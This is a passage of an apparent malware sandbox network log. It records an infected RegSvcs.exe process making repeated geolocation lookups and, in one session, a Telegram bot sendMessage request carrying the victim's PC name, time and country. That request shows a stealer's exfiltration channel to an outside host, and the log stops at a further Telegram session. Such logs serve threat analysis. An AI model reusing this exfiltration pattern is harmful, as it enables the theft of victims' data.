    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tGETcIC3t9jGm2qF%2BOGTR6YqlgBILMsRig5yqOSwI6LlXHT6A5TgUbDpF7WagPhCnhL%2BBtfxx6RLb1htb8HPXsSxNCc%2Fs4kxVqQjkmV2hA4Wb1hSnDUEnH5Y5dH3%2BKPYCjLDYtsk"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ffea0729d370fa8-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1547&min_rtt=1517&rtt_var=590&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1924851&cwnd=252&unsent_bytes=0&cid=5ddc1e78e6ae4f4f&ts=155&x=0"
2025-01-10 18:10:57 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49801 | 104.21.16.1 | 443 | 6108 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 18:10:58 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-01-10 18:10:58 UTC | 859 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 18:10:58 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1847447
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l8JuQ2veUO4C2Z96unbc9PH1R%2FID6qyuCv4WlzboQ%2FxrgHZyNPZzmqAi%2Bq%2F3lZueOR3TSGTHPz8sE0LYYviVuoFmVgAUB46BxRN03DMGgvUR2ThZNg28lcX1exXl5dPr4%2BfLt6CV"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ffea07aa8790fa8-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1483&min_rtt=1474&rtt_var=571&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1886304&cwnd=252&unsent_bytes=0&cid=4b43ef80ab3ced2f&ts=162&x=0"
2025-01-10 18:10:58 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.6 | 49808 | 104.21.16.1 | 443 | 6108 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 18:10:59 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
2025-01-10 18:10:59 UTC | 857 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 18:10:59 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1847448
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CK9PFEhBaR4HN8zeMwSJ16pDQ8cmfjQ0nwb1y9i8EiQjHlQgASFl3FbylS%2F8wpORZfsCZ4Oz5s1WIUcKGvd%2BzkkpwaUwVKIScZ52FE818r769nHRxYoqNs%2B%2Fy40TWU6s2AhpEiTf"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ffea0826ceb7293-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1888&min_rtt=1884&rtt_var=716&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1519250&cwnd=158&unsent_bytes=0&cid=4f769fa0fdab0eef&ts=152&x=0"
2025-01-10 18:10:59 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.6 | 49814 | 149.154.167.220 | 443 | 6108 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 18:11:00 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2011/01/2025%20/%2005:21:40%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive
2025-01-10 18:11:00 UTC | 344 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Date: Fri, 10 Jan 2025 18:11:00 GMT
    Content-Type: application/json
    Content-Length: 55
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 18:11:00 UTC | 55 | IN | Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.6 | 49826 | 104.21.16.1 | 443 | 2136 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 18:11:01 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-01-10 18:11:02 UTC | 863 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 18:11:02 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1847451
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=attMR2gorBmYN%2FKdIdKJp%2FF0dV3sJN%2BzkrC9Dj9MBZVxKNDs7Q%2FkoLPYJwlONEE015Mt0EeEQo8ilLtvjve8t%2BQSMxZcrzDJ2k3PGhYeBwP7A6txtOXmiu7jhK2zDWNnna%2B0%2FXNH"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ffea0919e1141ba-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1748&min_rtt=1741&rtt_var=668&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1619523&cwnd=192&unsent_bytes=0&cid=d6f80b5d12277388&ts=169&x=0"
2025-01-10 18:11:02 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.6 | 49833 | 104.21.16.1 | 443 | 2136 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 18:11:02 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
2025-01-10 18:11:02 UTC | 861 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 18:11:02 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1847451
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w6ZMHX6cEznJCGUvmbkQk%2FSh51HyLjGWVsV2%2FmujfqlSab2pPiaeFhYTs9UbelTiuml9whY9BIf5ONNYrTofyJJL3hGw0gjrW7S7UAk%2FYNJJSyVD%2Ffd%2F3cBpQuu9w3LUlf%2BvqLUL"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ffea096ac361899-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1715&min_rtt=1691&rtt_var=651&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1726788&cwnd=153&unsent_bytes=0&cid=c57e4acf96b83bfb&ts=161&x=0"
2025-01-10 18:11:02 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.6 | 49844 | 104.21.16.1 | 443 | 2136 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 18:11:03 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
2025-01-10 18:11:04 UTC | 855 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 18:11:04 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1847453
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UEPc%2FZbZizGN3s19NeHnypkC6k6YJnjPvOEzlicGv%2F352UiSgFiGVbpPCU8PbzQzBClnQ9kiC4fLoyOVa1dcjwrPt301oYl0ugW28pjo%2BSDCFDTfSUW57IPQJtEC6UJrJkXr7Bs2"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ffea09e7c6f4388-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1601&min_rtt=1595&rtt_var=610&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1775075&cwnd=221&unsent_bytes=0&cid=e36165d0412a22c4&ts=135&x=0"
2025-01-10 18:11:04 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.6 | 49853 | 104.21.16.1 | 443 | 2136 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 18:11:05 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-01-10 18:11:05 UTC | 857 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 18:11:05 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1847454
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8qg8jQ8eQh3BJHcKTsJulIQxcsQHshOGgVXM7J0j7ens98sHJN4hLvTo%2Fa9GDGnu4CeLRngRGheYOnWl4byqHyRikfyJt7NNWN0RBXoOkKb%2BCnLEhzc%2FIaZj2wUZc9FUSP%2BbL4Nw"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ffea0a66f0e4388-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1574&min_rtt=1563&rtt_var=594&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1868202&cwnd=221&unsent_bytes=0&cid=f41b8ed3a7657cd6&ts=161&x=0"
2025-01-10 18:11:05 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.6 | 49864 | 104.21.16.1 | 443 | 2136 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 18:11:06 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-01-10 18:11:06 UTC | 851 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 18:11:06 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1847455
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KKV8Y7jl4XU8Ccb8LakSGg7Qpfq0vlGljpa4iVZhF9YkplSNiTxVyjb1w10nTGP6NNtzsHItBkzP5baiuU5vDuwm3zkb34XAH5t0tuonBxeLLDKpQtiDDNGFU3bq4ncAF%2B06zMAw"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ffea0ae68ed4388-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1545&min_rtt=1533&rtt_var=599&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1789215&cwnd=221&unsent_bytes=0&cid=e85aa6d5ddad818b&ts=155&x=0"
2025-01-10 18:11:06 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.6 | 49876 | 104.21.16.1 | 443 | 2136 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 18:11:07 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
2025-01-10 18:11:07 UTC | 855 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 18:11:07 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1847457
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iAIlFFXlH6xhZ3IiR2Go0X5MvBL4WrmtOa1UW4eqFxysnP7VoMCBJ4w0GdNe5Dh%2B3kpto9Ul84PWpObzTo%2BYwRJK43TwtIcx%2BQQLp2rJ5dUKSBUwulB2lQNrtsxTP6HmL7VXSZiF"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ffea0b629c08ce3-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1838&min_rtt=1838&rtt_var=690&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1584373&cwnd=252&unsent_bytes=0&cid=f2d7571ba8f08a3f&ts=152&x=0"
2025-01-10 18:11:07 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.6 | 49885 | 104.21.16.1 | 443 | 2136 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 18:11:09 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-01-10 18:11:09 UTC | 861 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 18:11:09 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1847458
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2b8y0EMsK5sTmbecLrvC%2BJm%2B%2F82phrj6mECNns5Hl2RWM2UeaBiiJCbWh3pmXpRIkoizgSK%2BdomacaK%2FzTs74BIRtQPIYDIgYc4AnZXLPrjgwguGyk0XAXiqOaj6ek42ZdGzav%2Fc"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ffea0be48b37293-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1949&min_rtt=1947&rtt_var=735&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1484494&cwnd=158&unsent_bytes=0&cid=96bed7eab2edf65d&ts=151&x=0"
2025-01-10 18:11:09 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.6 | 49896 | 104.21.16.1 | 443 | 2136 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 18:11:10 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
2025-01-10 18:11:10 UTC | 855 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 18:11:10 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1847459
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AtSka7zJoNfHzhRsB3yK34Zy0G%2BAfRhnShba%2BGlXE6AFznKpYWTebN7JYi3SK2PdMGGi9fgGhSVUadLePvMJOPRwy3f8RgS35KEgbmjiGBL0YK0CYRUdhAsZaSeorC3eFpnQOp%2Bm"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ffea0c64b170fa8-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1538&min_rtt=1520&rtt_var=607&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1748502&cwnd=252&unsent_bytes=0&cid=07d5d4678f09d316&ts=155&x=0"
2025-01-10 18:11:10 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.6 | 49907 | 104.21.16.1 | 443 | 2136 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 18:11:11 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-01-10 18:11:11 UTC | 857 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 18:11:11 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1847460
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E4sitQm30GsLH1u2BTW0N9tepNlRBl1%2BnW9qJ%2F4orTPe%2BSjMk63Wjc9wtc3uI20i7xOmrhMP0tIQ6eUOGngiVIj3hN6%2BKA5mDAbTAhDLUNfnD6O9kz1wKNCz7TVeZkyY9euGXoQx"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ffea0ce49058ce3-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1830&min_rtt=1816&rtt_var=710&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1510605&cwnd=252&unsent_bytes=0&cid=cb34b34834dbfd93&ts=169&x=0"
2025-01-10 18:11:11 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.6 | 49913 | 149.154.167.220 | 443 | 2136 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
